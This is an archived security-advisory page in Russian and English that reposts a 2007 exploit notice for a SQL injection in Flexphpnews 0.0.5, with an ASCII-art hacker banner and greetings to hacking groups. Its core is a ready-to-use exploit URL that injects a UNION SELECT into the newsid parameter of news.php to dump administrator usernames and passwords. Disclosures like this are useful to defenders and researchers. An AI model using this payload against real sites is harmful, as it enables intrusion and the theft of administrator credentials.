Уведомление о безопасности: Flexphpnews 0.0.5 (news.php newsid) Remote SQL Injection Vulnerability

[RU] switch to
English Version

Дополнительная информация
  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )
  [Full-disclosure] Wordpress 2.1.2 xmlrpc Vulnerabilities
  CWB PRO Version 1.
5(INCLUDE_PATH)
Remote File Include Vulnerabilites
  CWB PRO Version 1.
5(INCLUDE_PATH)
Remote File Include Vulnerabilites
  MapLab MS4W 2.2.1 Remote File Inclusion Vulnerability

From: Dj7xpl <dj7xpl_(at)_yahoo.com>
Date: 5 апреля 2007 г.
Subject: Flexphpnews 0.0.5 (news.php newsid) Remote SQL Injection Vulnerability

                                                         .-
""""""""-.
                                                        /   Dj7xpl   \
                                                       |              |
                                                       |, .-. .-. ,|
                                                       | )(_o/ \o_)( |
                                                       |/     /\     \|
                                             (@_       (_     ^^     _)
                                        _     ) \_______\__|IIIIII|__/_______________________________
                                       (_)@8@8{}<________|-
\IIIIII/-|________________________________>
                                              )_/        \          /
                                              (@

+_______________________________________________Iranian Are The Best In World___________________________________________+
*
*
*       [~] Portal.......:    Flexphpnews version 0.0.5
* [~] Download.....:    http://www.china-on-site.com/flexphpsite/other.php
* [~] Author.......:    Dj7xpl | Dj7xpl@yahoo.com
* [~] Class........:    Remote SQL Injection Vulnerability
*
+________________________________________________________________________________
_______________________________________+

+________________________________________________________________________________
_______________________________________+
*
*
*       [~] Exploit......:     http://[Taget]/[Path]/news.php?newsid=999+union+select+0,username,
password+from+newsadmin
*
+________________________________________________________________________________
_______________________________________+

+________________________________________________________________________________
_______________________________________+
*
*
*       [~] Sp Tnx.......:     Milw0rm, Ashiyane, Delta Hacking, Virangar, Hackerz.ir, Shabgard.org, Simorgh .........
*
+________________________________________________________________________________
_______________________________________+

# milw0rm.com [2007-04-01]

test server